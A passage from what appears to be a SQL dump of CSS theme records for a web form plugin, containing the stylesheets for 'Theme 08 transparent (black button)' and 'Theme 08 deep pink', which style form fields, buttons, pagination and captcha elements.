30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #E6C18B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E6C18B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #F3CC92 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F3CC92 ), color-stop(39%, #F3CC92 ), color-stop(100%, #F5CB8F )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: \" \";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n',0),(28,'Theme 08 transparent (black button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nmargin-bottom: 10px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #000000;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\n\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #000000;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #000;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #000;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #FFF;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(29,'Theme 08 deep pink','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #930049;\r\nmargin-bottom: 10px;\r\ncolor: #930049;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #930049 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	